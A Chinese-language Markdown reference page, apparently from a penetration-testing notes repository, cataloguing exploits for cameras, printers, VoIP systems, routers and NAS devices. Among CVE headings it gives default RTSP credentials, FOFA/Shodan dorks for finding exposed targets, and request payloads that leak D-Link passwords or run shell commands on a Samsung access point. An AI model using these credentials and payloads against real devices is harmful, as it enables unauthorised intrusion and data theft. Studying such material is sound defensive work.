Skip to content

Latest commit

 

History

History
443 lines (312 loc) · 16.2 KB

Device-Exploits.md

File metadata and controls

443 lines (312 loc) · 16.2 KB

Device-Exploits


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


硬件产品默认口令


CPU

Meltdown/Spectre

PLATYPUS


Camera

RTSP 弱口令

  • 华为 : rtsp://admin:HuaWei123@IP/LiveMedia/ch1/Media1
  • 海康威视 主码流 : rtsp://admin:12345@IP:554/h264/ch1/main/av_stream
  • 海康威视 主码流 : rtsp://admin:12345@IP:554/MPEG-4/ch1/main/av_stream
  • 海康威视 主码流 : rtsp://admin:12345@IP:554/h264/ch1/main/av_stream
  • 海康威视 子码流 : rtsp://admin:12345@IP/mpeg4/ch1/sub/av_stream
  • 海康威视 子码流 : rtsp://admin:12345@IP/h264/ch1/sub/av_stream
  • 宇视 主码流 : rtsp://admin:admin@IP:554/video1
  • 宇视 子码流 : rtsp://admin:admin@IP:554/video2
  • 宇视 三码流 : rtsp://admin:admin@IP:554/video3

海康威视

相关工具

CVE-2017-7921

CVE-2021-36260

DVR

CVE-2018-9995

Dahua

CVE-2017-7925

CVE-2021-33044 & CVE-2021-33045

D-Link

CVE-2020-25078 DCS系列监控账号密码信息泄露

  • POC | Payload | exp
    /config/getuser?index=0
    

VideoIQ

VideoIQ Camera - Local File Disclosure


Printer

相关文章

资源

相关工具

  • PRET
    # Installation
    git clone https://github.com/RUB-NDS/PRET.git
    cd PRET
    
    pip install colorama pysnmp
    
    # Usage
    python2 ./pret.py
    python2 ./pret.py xxx.xxx.xxx.xxx pjl
    python2 ./pret.py xxx.xxx.xxx.xxx ps
    python2 ./pret.py xxx.xxx.xxx.xxx pcl

SIP / VoIP

相关文章

Cisco Unified Communications Manager

fofa: product=="CISCO-UCM" shodan: http.html:"Cisco Unified Communications Manager"

用户名泄漏

/cucm-uds/users

ConfigFileCacheList.txt 泄漏

部分 CUCM 服务器在端口 TCP/6970 上有一个 HTTP 服务,其中存在 ConfigFileCacheList.txt 文件,包含位于 TFTP 目录中的所有文件名.

x.x.x.x:6970/ConfigFileCacheList.txt

CVE-2019-15972 Authenticated SQLi


Router / Switch

漏洞库

资源

漏洞利用框架

  • routersoloit

    Installation

    git clone https://www.github.com/threat9/routersploit.git
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py

    Usage

    use scanners/autopwn
    set target
    run

相关工具

  • RouterPassView

CISCO

相关文章

CVE-2017-6736 Cisco IOS remote code execution

  • 简介

    Cisco IOS 和 IOS XE 都是美国思科(Cisco)公司为其网络设备开发的操作系统。Simple Network Management Protocol(SNMP)subsystem 是其中的一个用于网络设备管理信息交换的简单网络管理子系统。

    Cisco IOS 12.0 版本至 12.4 版本、15.0 版本至 15.6 版本和 IOS XE 2.2 版本至 3.17 版本中的 SNMP 子系统中存在安全漏洞。远程攻击者可通过向受影响系统发送特制的 SNMP 数据包利用该漏洞在受影响的系统上执行任意代码或造成系统重启。以下版本受到影响:SNMP 1版本,2c版本,3版本。

  • 影响版本

    • Cisco:Ios:12.0(28a):::
    • Cisco:Ios:12.1(19)ec:::
    • Cisco:Ios:12.2(14)s13:::
    • Cisco:Ios:12.1(19)e7:::
    • Cisco:Ios:12.2(14)s12:::
  • POC | Payload | exp

CVE-2018-0171 Cisco Smart Install远程代码执行漏洞

fofa: protocol="smi"

CVE-2019-1652 && CVE-2019-1653 Cisco RV320

fofa: app="CISCO-RV320”

Type7密码解密

h3c

相关工具

密文解密

小米

CVE-2019-18370

  • 简介

    Xiaomi Mi WiFi R3G 是中国小米科技(Xiaomi)公司的一款 3G 路由器。

    Xiaomi Mi WiFi R3G 2.28.23-stable 之前版本中存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。

  • 影响版本

    • Mi:Millet_router_3g:-:::*
  • POC | Payload | exp

CVE-2019-18371

  • 简介

    Xiaomi Mi WiFi R3G 2.28.23-stable 之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。

  • 影响版本

    • Mi:Millet_router_3g:-:::*
  • POC | Payload | exp

OpenWrt

CVE-2019-12272 OpenWrt 图形化管理界面 LuCI 命令注入

  • 简介

    OpenWrt LuCI 是一款用于 OpenWrt(Linux 发行版)的图形化配置界面。

    OpenWrt LuCI 0.10 及之前版本中的 admin/status/realtime/bandwidth_status 和 admin/status/realtime/wireless_status 端点存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。

  • 影响版本

    • Openwrt:Luci:0.10.0:::
  • 相关文章

  • POC | Payload | exp

Netlink

Netlink GPON Router 1.0.11 - Remote Code Execution

ruijie

CNVD-2021-09650 EWEB网管系统命令执行 /guest_auth/guestIsUp.php

CNVD-2021-14536 锐捷 RG-UAC 统一上网行为管理审计系统信息泄露漏洞

NBR路由器CLI命令执行漏洞 /WEB_VMS/LEVEL15/

锐捷网关(RG-EG)信息泄露管理员账号密码+RCE

锐捷EG易网关 phpinfo.view.php 信息泄露漏洞

  • POC | Payload | exp
    /tool/view/phpinfo.view.php
    

Samsung

三星 WLAN AP WEA453e路由器远程命令执行

  • FOFA: title=="Samsung WLAN AP"
  • POC | Payload | exp
    POST /(download)/tmp/a.txt HTTP/1.1
    
    command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
    

飞鱼星

权限绕过信息泄露漏洞

iKuai

相关文章

SQL注入漏洞

D-Link

CVE-2019-17506 D-Link Dir-645 getcfg.php 账号密码泄露漏洞

  • POC | Payload | exp
    POST /getcfg.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
    

DrayTek

CVE-2020-8515

Netgear

Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities

TP-Link

CVE-2021-41653 TL-WR840N rce

GPON

fofa: app="DZS-ZNID-GPON-Router"

CVE-2018-10562


NAS

ZyXel NAS

CVE-2022-34747 格式化字符串漏洞